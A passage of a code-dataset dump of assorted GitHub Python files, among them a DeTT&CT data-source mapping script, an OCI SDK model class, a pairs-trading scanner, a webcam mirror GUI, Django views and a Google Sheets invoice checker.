{"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}]} +{"seq_id": "37173805395", "text": "import openpyxl\nimport json\n\nFILE_PATH_DETTECT_DS_XLSX = '../../../data/dettect_data_sources.xlsx'\nEXCEL_COLUMNS_OF_INTEREST = ['E', 'F', 'G', 'H']\nFILE_DATA_SOURCES_PLATFORMS = 'dettect_data_sources.json'\n\n\nclass DeTTECTDataSources():\n \"\"\"\n Update the mapping of techniques to DeTT&CT data sources ('dettect_data_sources.json')\n based on the content within 'dettect_data_sources.xlsx'.\n \"\"\"\n\n def __init__(self):\n self.excel_dict = self._create_dict_from_excel()\n\n def _create_dict_from_excel(self):\n \"\"\"\n Create a dictionary from the Excel file 'dettect_data_sources.xlsx' with the data we need.\n :return:\n \"\"\"\n excel_file = openpyxl.load_workbook(FILE_PATH_DETTECT_DS_XLSX)\n excel_sheet = excel_file['Techniques']\n\n excel_dict = {}\n\n row_idx = 2\n for _ in excel_sheet.iter_rows():\n tech_id = excel_sheet['A' + str(row_idx)].value\n if tech_id != None:\n excel_dict[tech_id] = []\n\n for c in EXCEL_COLUMNS_OF_INTEREST:\n cell_value = excel_sheet[c + str(row_idx)].value\n if cell_value:\n excel_dict[tech_id].append(excel_sheet[c + str(row_idx)].value)\n row_idx += 1\n\n return excel_dict\n\n def create_dettect_data_sources_json(self):\n \"\"\"\n Generate the content for the file 'dettect_data_sources.json' and write to disk.\n :return:\n \"\"\"\n ds_per_technique = []\n\n for k, v in self.excel_dict.items():\n tmp_d = {}\n tmp_d['technique_id'] = k\n\n # Make sure that Network Traffic Content is always shown last in the list\n # (also sort the DeTT&CT data sources)\n all_data_source_except = set(v).difference(['Network Traffic Content'])\n sorted_ds = [ds + ' [DeTT&CT data source]' for ds in sorted(list(all_data_source_except))] + \\\n [ds for ds in v if ds == 'Network Traffic Content']\n tmp_d['dettect_data_sources'] = sorted_ds\n\n ds_per_technique.append(tmp_d)\n\n # Write file to disk\n with open('../../../data/' + FILE_DATA_SOURCES_PLATFORMS, 'w') as f:\n json.dump(ds_per_technique, f, indent=2)\n return ds_per_technique\n\n\nif __name__ == \"__main__\":\n dettect_data_sources = DeTTECTDataSources()\n dettect_data_sources.create_dettect_data_sources_json()\n", "repo_name": "rabobank-cdc/DeTTECT", "sub_path": ".github/workflows/scripts/update_dettect_data_sources.py", "file_name": "update_dettect_data_sources.py", "file_ext": "py", "file_size_in_byte": 2442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1865, "dataset": "github-code", "pt": "52", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "31600407669", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass OpsiDataObjectSummary(object):\n \"\"\"\n Summary of an OPSI data object.\n \"\"\"\n\n #: A constant which can be used with the data_object_type property of a OpsiDataObjectSummary.\n #: This constant has a value of \"DATABASE_INSIGHTS_DATA_OBJECT\"\n DATA_OBJECT_TYPE_DATABASE_INSIGHTS_DATA_OBJECT = \"DATABASE_INSIGHTS_DATA_OBJECT\"\n\n #: A constant which can be used with the data_object_type property of a OpsiDataObjectSummary.\n #: This constant has a value of \"HOST_INSIGHTS_DATA_OBJECT\"\n DATA_OBJECT_TYPE_HOST_INSIGHTS_DATA_OBJECT = \"HOST_INSIGHTS_DATA_OBJECT\"\n\n #: A constant which can be used with the data_object_type property of a OpsiDataObjectSummary.\n #: This constant has a value of \"EXADATA_INSIGHTS_DATA_OBJECT\"\n DATA_OBJECT_TYPE_EXADATA_INSIGHTS_DATA_OBJECT = \"EXADATA_INSIGHTS_DATA_OBJECT\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new OpsiDataObjectSummary object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.opsi.models.HostInsightsDataObjectSummary`\n * :class:`~oci.opsi.models.DatabaseInsightsDataObjectSummary`\n * :class:`~oci.opsi.models.ExadataInsightsDataObjectSummary`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param identifier:\n The value to assign to the identifier property of this OpsiDataObjectSummary.\n :type identifier: str\n\n :param data_object_type:\n The value to assign to the data_object_type property of this OpsiDataObjectSummary.\n Allowed values for this property are: \"DATABASE_INSIGHTS_DATA_OBJECT\", \"HOST_INSIGHTS_DATA_OBJECT\", \"EXADATA_INSIGHTS_DATA_OBJECT\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type data_object_type: str\n\n :param display_name:\n The value to assign to the display_name property of this OpsiDataObjectSummary.\n :type display_name: str\n\n :param description:\n The value to assign to the description property of this OpsiDataObjectSummary.\n :type description: str\n\n :param name:\n The value to assign to the name property of this OpsiDataObjectSummary.\n :type name: str\n\n :param group_names:\n The value to assign to the group_names property of this OpsiDataObjectSummary.\n :type group_names: list[str]\n\n \"\"\"\n self.swagger_types = {\n 'identifier': 'str',\n 'data_object_type': 'str',\n 'display_name': 'str',\n 'description': 'str',\n 'name': 'str',\n 'group_names': 'list[str]'\n }\n\n self.attribute_map = {\n 'identifier': 'identifier',\n 'data_object_type': 'dataObjectType',\n 'display_name': 'displayName',\n 'description': 'description',\n 'name': 'name',\n 'group_names': 'groupNames'\n }\n\n self._identifier = None\n self._data_object_type = None\n self._display_name = None\n self._description = None\n self._name = None\n self._group_names = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['dataObjectType']\n\n if type == 'HOST_INSIGHTS_DATA_OBJECT':\n return 'HostInsightsDataObjectSummary'\n\n if type == 'DATABASE_INSIGHTS_DATA_OBJECT':\n return 'DatabaseInsightsDataObjectSummary'\n\n if type == 'EXADATA_INSIGHTS_DATA_OBJECT':\n return 'ExadataInsightsDataObjectSummary'\n else:\n return 'OpsiDataObjectSummary'\n\n @property\n def identifier(self):\n \"\"\"\n **[Required]** Gets the identifier of this OpsiDataObjectSummary.\n Unique identifier of OPSI data object.\n\n\n :return: The identifier of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._identifier\n\n @identifier.setter\n def identifier(self, identifier):\n \"\"\"\n Sets the identifier of this OpsiDataObjectSummary.\n Unique identifier of OPSI data object.\n\n\n :param identifier: The identifier of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._identifier = identifier\n\n @property\n def data_object_type(self):\n \"\"\"\n **[Required]** Gets the data_object_type of this OpsiDataObjectSummary.\n Type of OPSI data object.\n\n Allowed values for this property are: \"DATABASE_INSIGHTS_DATA_OBJECT\", \"HOST_INSIGHTS_DATA_OBJECT\", \"EXADATA_INSIGHTS_DATA_OBJECT\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The data_object_type of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._data_object_type\n\n @data_object_type.setter\n def data_object_type(self, data_object_type):\n \"\"\"\n Sets the data_object_type of this OpsiDataObjectSummary.\n Type of OPSI data object.\n\n\n :param data_object_type: The data_object_type of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n allowed_values = [\"DATABASE_INSIGHTS_DATA_OBJECT\", \"HOST_INSIGHTS_DATA_OBJECT\", \"EXADATA_INSIGHTS_DATA_OBJECT\"]\n if not value_allowed_none_or_none_sentinel(data_object_type, allowed_values):\n data_object_type = 'UNKNOWN_ENUM_VALUE'\n self._data_object_type = data_object_type\n\n @property\n def display_name(self):\n \"\"\"\n **[Required]** Gets the display_name of this OpsiDataObjectSummary.\n User-friendly name of OPSI data object.\n\n\n :return: The display_name of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._display_name\n\n @display_name.setter\n def display_name(self, display_name):\n \"\"\"\n Sets the display_name of this OpsiDataObjectSummary.\n User-friendly name of OPSI data object.\n\n\n :param display_name: The display_name of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._display_name = display_name\n\n @property\n def description(self):\n \"\"\"\n Gets the description of this OpsiDataObjectSummary.\n Description of OPSI data object.\n\n\n :return: The description of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"\n Sets the description of this OpsiDataObjectSummary.\n Description of OPSI data object.\n\n\n :param description: The description of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._description = description\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this OpsiDataObjectSummary.\n Name of the data object, which can be used in data object queries just like how view names are used in a query.\n\n\n :return: The name of this OpsiDataObjectSummary.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this OpsiDataObjectSummary.\n Name of the data object, which can be used in data object queries just like how view names are used in a query.\n\n\n :param name: The name of this OpsiDataObjectSummary.\n :type: str\n \"\"\"\n self._name = name\n\n @property\n def group_names(self):\n \"\"\"\n Gets the group_names of this OpsiDataObjectSummary.\n Names of all the groups to which the data object belongs to.\n\n\n :return: The group_names of this OpsiDataObjectSummary.\n :rtype: list[str]\n \"\"\"\n return self._group_names\n\n @group_names.setter\n def group_names(self, group_names):\n \"\"\"\n Sets the group_names of this OpsiDataObjectSummary.\n Names of all the groups to which the data object belongs to.\n\n\n :param group_names: The group_names of this OpsiDataObjectSummary.\n :type: list[str]\n \"\"\"\n self._group_names = group_names\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/opsi/models/opsi_data_object_summary.py", "file_name": "opsi_data_object_summary.py", "file_ext": "py", "file_size_in_byte": 8911, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 155, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 256, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "14440098824", "text": "# 95 pct dates are stationary\n# 95 pct threshold\n# Ergodic Theorem\nimport time\nimport warnings\nfrom tqdm.auto import tqdm\nfrom statsmodels.tsa.vector_ar.vecm import coint_johansen\nimport matplotlib.pyplot as plt\nimport math\nfrom pandas_datareader import data as wb\nimport numpy as np\nimport pandas as pd\nfrom inspect import trace\nimport multiprocessing as mp\nimport yfinance as yf\nyf.pdr_override()\nwarnings.filterwarnings('ignore')\n\npairs_info = pd.DataFrame(\n columns=['symb1', 'symb2', 'coef1', 'coef2', 'direction'])\n\n\ndef statsGen(data):\n\n adjClose = data.iloc[:, :2]\n result = coint_johansen(adjClose, det_order=0, k_ar_diff=1)\n\n return result.lr1, result.cvt, result.lr2, result.cvm, result.evec\n\n\ndef signalgenerator(row):\n\n symb1 = row['symb1']\n symb2 = row['symb2']\n pair = (symb1, symb2)\n\n data = wb.get_data_yahoo(pair)[['Adj Close', 'Volume']]\n\n data = data.dropna()\n\n data[f'coef_{pair[0]}'] = None\n data[f'coef_{pair[1]}'] = None\n data['portfolio'] = None\n\n for i in tqdm(range(50, len(data))):\n try:\n evec = statsGen(data.iloc[:i+1, :])[4][0]\n coef1 = evec[0]\n coef2 = evec[1]\n data.iloc[i, -3] = coef1\n data.iloc[i, -2] = coef2\n\n if i != len(data)-1:\n data.iloc[i+1, -1] = coef1 * \\\n data.iloc[i, 0] + coef2 * data.iloc[i, 1]\n except:\n pass\n\n adjdata = data.dropna()\n\n historical = adjdata.iloc[:-1, :]\n today_value = adjdata.iloc[-1, -1]\n\n above = historical[historical['portfolio'] >=\n today_value].shape[0] / historical.shape[0]\n below = historical[historical['portfolio'] <=\n today_value].shape[0] / historical.shape[0]\n\n historica_volume = historical['Volume'].mean()\n\n if above < 0.025 and historica_volume[0] > 3500000 and historica_volume[1] > 3500000:\n return {'symb1': symb1, 'symb2': symb2,\n 'coef1': adjdata.iloc[-1, -3], 'coef2': adjdata.iloc[-1, -2], 'direction': 'Short'}\n elif below < 0.025 and historica_volume[0] > 3500000 and historica_volume[1] > 3500000:\n return {'symb1': symb1, 'symb2': symb2,\n 'coef1': adjdata.iloc[-1, -3], 'coef2': adjdata.iloc[-1, -2], 'direction': 'Long'}\n else:\n return None\n\n\ncombined = pd.DataFrame()\nfor j in range(0, 1):\n data = pd.read_csv('cointegrated_pairs_{}.csv'.format(j))\n combined = combined.append(data, ignore_index=True)\n\n\nif __name__ == '__main__':\n \n start_time = time.time()\n\n results = []\n with mp.Pool(mp.cpu_count()) as pool:\n\n for i in tqdm(range(combined.shape[0])):\n results.append(pool.apply_async(\n signalgenerator, args=(combined.iloc[i, :],)))\n for result in results:\n if result.get() != None:\n pairs_info = pairs_info.append(result.get(), ignore_index=True)\n pool.close()\n pool.join()\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n", "repo_name": "LightFormingAGC/Stock_Prediction", "sub_path": "Mean_Reverting/pairsscanner.py", "file_name": "pairsscanner.py", "file_ext": "py", "file_size_in_byte": 3016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yfinance.pdr_override", "line_number": 16, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "call"}, {"api_name": "statsmodels.tsa.vector_ar.vecm.coint_johansen", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas_datareader.data.get_data_yahoo", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 37, "usage_type": "name"}, {"api_name": "tqdm.auto.tqdm", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 89, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 92, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 92, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 94, "usage_type": "call"}, {"api_name": "time.time", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "69841642084", "text": "\"\"\"\nCreated on 22 January 2022\nName: Mirror.py\nAuthor: Jake Grosse\nDescription: A Python GUI which creates a mirror for the user to see themselves in.\n\nCitation: The following link was used to consult few things at the end as I discovered that, of course,\n someone had thought of this exact idea and made a webcam photo booth. The project has been a\n process of revision and redesign, going from a game manual, to a Rick-Roll, now to a\n mirror. I found the CV2 library a few days ago and PIL and tk are standard.\n\n I looked to the internet for help with tkinter labels to properly format images from CV2 inputs\n and to see how other people handled color. I found both in one link with a very similar\n format to my own code. I will sign a sheet of paper that says that I wrote everything except\n that which is cited as not written by me. I promise you I did write most of this before looking\n online at this detailed project.\n https://solarianprogrammer.com/2018/04/21/python-opencv-show-video-tkinter-window/\n This link is referred to as SOLARIAN from here on out so I don't have to make the code ugly with links.\n I realize that this link has other features which I do not, but I wasn't going to write it off as my own\n nor was I going to get the deduction for citing huge portions of code. Therefore, we have a mirror and not\n a camera booth. It is referenced in two places in this file.\n\"\"\"\n\n# import GUI container/utility (tkinter)\nimport tkinter as tk\n# import threads to use for streaming video\nimport threading as td\n# import open computer vision library\nimport cv2\n# import pillow image handling objects\nfrom PIL import Image, ImageTk\n\n\n# a class extending tkinter.Tk which holds a place for a webcam input\nclass Mirror(tk.Tk):\n def __init__(self, title, geom=\"1280x720\"):\n # initialize superclass tk window\n tk.Tk.__init__(self)\n # change the tkinter title\n self.title(title)\n # change the tkinter geometry\n self.geometry(geom)\n # background color change\n self.configure(bg=\"grey\")\n\n # delay wait time as I found was needed for an update or it would literally just freeze\n # incorporated in the update method using tk.after in relation to self\n self.wait_time_ms = 15\n\n # get video opened to use (zero is the primary webcam source)\n self.video = VideoRecorder(0)\n # wiki says canvas is better than frame for images\n # make a canvas to output video to, but labels\n # don't flicker when updating several times per second\n self.lbl = tk.Label(self, width=1200, height=720)\n self.lbl.pack()\n\n # creating a thread to run the video otherwise the window never opens\n self.video_thread = td.Thread(target=self.stream)\n # daemon thread\n self.video_thread.daemon = 1\n # start the video stream\n self.video_thread.start()\n\n # disallow the window from being resized so we don't have extra movement with the camera not scaling\n self.resizable(0, 0)\n\n self.mainloop()\n\n # stream the webcam input to the associated label on the \"Mirror\"\n def stream(self):\n # display video\n while self.video.isOpened():\n # capture frame from video\n returned_frame, frame = self.video.read()\n if returned_frame:\n # FROM SOLARION, second parameter was copy pasted, the rest was hand typed\n temp_image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n vp_dims = self.video.get_geom()\n # FROM SOLARION, the use of fromarray is being cited to solve a problem\n # transpose just flips from left to right\n # Resize just doubles the viewport dimensions so that the image fills most of the screen\n self.photo = ImageTk.PhotoImage(image=Image.fromarray(temp_image).transpose(method=Image.FLIP_LEFT_RIGHT).resize((2*vp_dims[0], 2*vp_dims[1])))\n\n # set label image to the selected photo (credit Ted for teaching this)\n self.lbl.configure(image=self.photo)\n self.lbl.image = self.photo\n # delay in updates so that the computer isn't fully consumed by processing individual images\n cv2.waitKey(self.wait_time_ms)\n\n\n# a class responsible for capturing and handling the dimensions and release of video resources\nclass VideoRecorder(cv2.VideoCapture):\n def __init__(self, source):\n cv2.VideoCapture.__init__(self, source)\n # setting viewport width and height in pixels\n # commands found in documentation https://docs.opencv.org/4.x/index.html\n self.vp_width = self.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.vp_height = self.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n # when the object is deleted, see if the video is active and if it is then release the video device\n def __del__(self):\n if self.isOpened():\n self.release()\n\n # returns a list of the viewport dimensions in pixels of the camera\n def get_geom(self):\n # cast to integers because they default to float values\n return [int(self.vp_width), int(self.vp_height)]\n\n", "repo_name": "jgrosse01/CS495_MagicMirror_PyGUIProject", "sub_path": "GUI/Mirror.py", "file_name": "Mirror.py", "file_ext": "py", "file_size_in_byte": 5273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Tk", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 93, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture.__init__", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 95, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 98, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "39457308556", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, auth\nfrom django.contrib import messages\nfrom django.template import loader, Context\nfrom django.http import HttpResponse\nimport logging\n\nfrom . models import Userprofile\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n 'format': '%(name)-12s %(levelname)-8s %(message)s'\n },\n 'file': {\n 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'console'\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'formatter': 'file',\n 'filename': '/tmp/debug.log'\n }\n },\n 'loggers': {\n '': {\n 'level': 'DEBUG',\n 'handlers': ['console', 'file']\n }\n }\n})\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n@login_required(login_url=\"login\")\ndef index(request):\n return redirect('/core/dashboard.html')\n\n@login_required(login_url=\"login\")\ndef dashboard(request):\n return redirect('/core/dashboard.html')\n\n@login_required(login_url=\"login\")\ndef pages(request):\n \n context = dict({'user_data': Userprofile.objects.all()})\n # All resource paths end in .html.\n # Pick out the html file name from the url. And load that template.\n data = Userprofile.objects.get(user_id=request.user.id)\n # logger.info()\n try:\n load_template = request.path.split('/')[-1]\n # template = loader.get_template('core/' + load_template)\n # return HttpResponse(template.render(context, request))\n # return render(request, 'core/' + load_template, {'user_data': user_data[0]})\n return render(request, 'core/' + load_template, {'profile': data})\n except:\n return render(request, '/')\n\n@login_required(login_url=\"login\")\ndef updest(request):\n messages.info(request, '')\n context = {\n 'output' : False,\n 'message' : 'Invalid Credentials'\n }\n if request.method == 'POST':\n company = request.POST['company']\n firstname = request.POST['firstname']\n lastname = request.POST['lastname']\n email = request.POST['email']\n address = request.POST['address']\n aboutme = request.POST['aboutme']\n\n usr, boolCreated = Userprofile.objects.update_or_create(user_id=request.user.id, defaults={'company': company, 'address': address, 'about': aboutme})\n\n if boolCreated:\n messages.info(request, 'Something went wrong, try again!')\n else:\n messages.info(request, 'Profile Updated!')\n\n return redirect('./user.html')\n else:\n return redirect('./user.html')\n", "repo_name": "Liopun/djashboard", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.config.dictConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 47, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Userprofile.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Userprofile.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Userprofile", "line_number": 56, "usage_type": "name"}, {"api_name": "models.Userprofile.objects.get", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Userprofile.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Userprofile", "line_number": 59, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 68, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 72, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 72, "usage_type": "name"}, {"api_name": "models.Userprofile.objects.update_or_create", "line_number": 85, "usage_type": "call"}, {"api_name": "models.Userprofile.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "models.Userprofile", "line_number": 85, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 88, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 88, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 90, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 90, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "9876944144", "text": "import requests\n\ndef get_health_value(account: str) -> str:\n url = 'https://api.debank.com/portfolio/project_list?user_addr=' + account\n response = requests.get(url)\n\n if response.ok:\n dict = response.json()\n data = dict['data']\n for x in data:\n if x['id'] == 'bsc_venus':\n health_value = x['portfolio_item_list'][0]['detail']['health_rate']\n return round(health_value, 2)\n\n else:\n print('Error:', response.status_code)\n \n \ndef get_price(ticker: str):\n url = 'https://api.binance.com/api/v3/ticker/price?symbol=' + ticker.upper()\n response = requests.get(url)\n \n if response.ok:\n dict = response.json()\n return dict['price']\n \n else:\n print('Error:', response.status_code)\n ", "repo_name": "vernonwhy/telegram-portfolio-bot", "sub_path": "request_service.py", "file_name": "request_service.py", "file_ext": "py", "file_size_in_byte": 811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "10334055929", "text": "import gspread\nfrom google.oauth2.service_account import Credentials\nfrom datetime import datetime\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nspreadsheet = GSPREAD_CLIENT.open('LPFMWFY23')\n\nlpf_sheet = spreadsheet.worksheet('LPF')\napproved_sheet = spreadsheet.worksheet('Approved')\nrejected_sheet = spreadsheet.worksheet('Rejected')\n\n\ndef query_item_price_and_buyer(invoice_date, item_code, site):\n formatted_date = datetime.strptime(\n invoice_date, '%d/%m/%Y').strftime('%b-%y')\n data = lpf_sheet.get_all_records()\n\n item_found = False\n buyer = None\n price_from_lpf = None\n\n for entry in data:\n if entry['ItemCode'] == item_code and entry['Site'] == site:\n price = entry.get(formatted_date)\n price_from_lpf = price\n buyer = entry.get('Buyer')\n if price:\n item_found = True\n return price, buyer, price_from_lpf\n if not item_found:\n return None, None, None\n return None, None, None\n\n\ndef push_to_approved_sheet(invoice_date, item_code, site, invoice_price, system_price, document_reference, buyer, price_from_lpf, price_variance):\n status = \"Approved - please pay\"\n row = [invoice_date, document_reference, item_code, site, invoice_price,\n system_price, price_from_lpf, price_variance, buyer, status]\n approved_sheet.append_rows([row])\n print(\"Succesfully added to the approved log.\")\n\n\ndef push_to_rejected_sheet(invoice_date, item_code, site, invoice_price, system_price, document_reference, buyer, price_from_lpf, price_variance):\n status = \"Rejected - please request credit from the supplier\"\n row = [invoice_date, document_reference, item_code, site, invoice_price,\n system_price, price_from_lpf, price_variance, buyer, status]\n rejected_sheet.append_rows([row])\n print(\"Succesfully added to the rejected log.\")\n\n\ndef create_rejected_invoices_report():\n while True:\n print(\"\\n=== Enter Invoice Details ===\")\n invoice_date = input(\"Enter invoice date (dd/mm/yyyy): \\n\")\n document_reference = input(\"Enter document reference: \\n\")\n item_code = input(\"Enter item code: \\n\").upper()\n site_input = input(\"Enter site: \\n\").upper()\n site = \"MW\" if site_input == \"MW\" else \"MANTON WOOD\"\n invoice_price = get_valid_numbers(\"Enter invoice price: \\n\")\n system_price = get_valid_numbers(\"Enter system price: \\n\")\n price_variance = get_valid_numbers(\"Variance to PO (£): \\n\")\n\n correct_details = input(\"Are the details correct? (yes/no): \\n\")\n if correct_details.lower() != 'yes':\n break\n\n price, buyer, price_from_lpf = query_item_price_and_buyer(\n invoice_date, item_code, site)\n\n print(\"\\n=== Report Results ===\")\n if price is not None:\n if abs(float(invoice_price) - float(price)) <= 0.01:\n push_to_approved_sheet(invoice_date, item_code, site, invoice_price,\n system_price, document_reference, buyer, price_from_lpf, price_variance)\n print(\"Invoice Approved, please pay\")\n print(\"Invoice Date:\", invoice_date)\n print(\"Document Reference:\", document_reference)\n print(\"Item Code:\", item_code)\n print(\"Site:\", site)\n print(\"Invoice Price\", invoice_price)\n print(\"System Price\", system_price)\n print(\"Price from LPF:\", price_from_lpf)\n print(\"Variance to PO (£):\", price_variance)\n print(\"Buyer\", buyer)\n\n else:\n push_to_rejected_sheet(invoice_date, item_code, site, invoice_price,\n system_price, document_reference, buyer, price_from_lpf, price_variance)\n print(\"Invoice Rejected. Please request credit\")\n print(\"Invoice Date:\", invoice_date)\n print(\"Document Reference:\", document_reference)\n print(\"Item Code:\", item_code)\n print(\"Site:\", site)\n print(\"Invoice Price\", invoice_price)\n print(\"System Price\", system_price)\n print(\"Price from LPF:\", price_from_lpf)\n print(\"Variance to PO (£):\", price_variance)\n print(\"Buyer\", buyer)\n\n continue_input = input(\n \"Do you want to submit another invoice? (yes/no): \")\n if continue_input.lower() != 'yes':\n break\n\n\ndef get_valid_numbers(prompt):\n while True:\n try:\n value = float(input(prompt))\n return value\n except ValueError:\n print(\"Invalid input, please enter the correct price\")\n\n\ncreate_rejected_invoices_report()\n", "repo_name": 